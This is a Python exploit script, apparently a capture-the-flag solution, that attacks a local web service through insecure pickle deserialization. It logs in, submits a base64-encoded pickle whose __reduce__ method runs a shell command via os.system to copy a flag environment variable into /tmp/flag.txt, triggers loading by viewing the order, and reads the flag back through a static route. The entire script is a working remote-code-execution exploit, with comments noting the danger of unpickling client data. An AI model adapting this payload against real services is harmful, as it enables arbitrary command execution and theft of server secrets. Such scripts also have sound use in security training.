import pickle
import base64
import requests
import os
import time

# Base address of the target; it points at a service on the local machine.
url = "http://localhost:42550"

# Step 1: log in.
# A Session is used so that any cookie set by /login is sent on later requests.
session = requests.Session()
credentials = {'username': 'test', 'password': 'test'}
login_response = session.post(url + "/login", data=credentials)
# Success is judged only by whether a cookie was stored; the HTTP status of
# login_response is not inspected.
login_status = "成功" if session.cookies.get_dict() else "失败"
print("登录状态:", login_status)

# Step 2: build the crafted order. Original author's note: this time the flag
# is written to a location the application can access.
class RCE:
    """Object whose pickled form tells the unpickler to call a function.

    pickle records the (callable, args) pair returned by ``__reduce__`` and the
    loading side invokes it during ``pickle.loads``. This is the reason a
    service must never unpickle bytes supplied by a client; a data-only format
    such as JSON does not have this property.
    """

    def __reduce__(self):
        # Write the value of the DASFLAG environment variable to /tmp/flag.txt.
        command = 'echo $DASFLAG > /tmp/flag.txt'
        return (os.system, (command,))

# Serialize the object and base64-encode it so it can travel in a form field.
payload = pickle.dumps(RCE())
order_data = base64.b64encode(payload).decode()
encoded_length = len(order_data)
print(f"Payload 长度: {encoded_length}")

# Submit the encoded blob as the order body.
create_endpoint = f"{url}/create_order"
response = session.post(create_endpoint, data={'order_data': order_data})
print("创建订单响应:", response.text)

if response.status_code != 200:
    print("创建订单失败")
else:
    # The script expects a JSON body carrying an 'order_id' key.
    order_id = response.json()['order_id']
    print(f"订单ID: {order_id}")

    # Step 3: trigger deserialization.
    # Per the original comment, viewing the order is what makes the server
    # load the stored blob; the server code is not shown here. The server-side
    # remedy is to stop unpickling client-supplied order data.
    time.sleep(1)
    view_endpoint = f"{url}/view_order/{order_id}"
    view_response = session.get(view_endpoint)
    print("查看订单状态码:", view_response.status_code)

    # Step 4: read the flag through the /static/ route.
    # NOTE(review): assumes the server exposes that file under /static/;
    # nothing in this script establishes it.
    time.sleep(1)
    flag_response = session.get(f"{url}/static/flag.txt")
    flag_text = flag_response.text.strip()
    print("Flag 内容:", flag_text)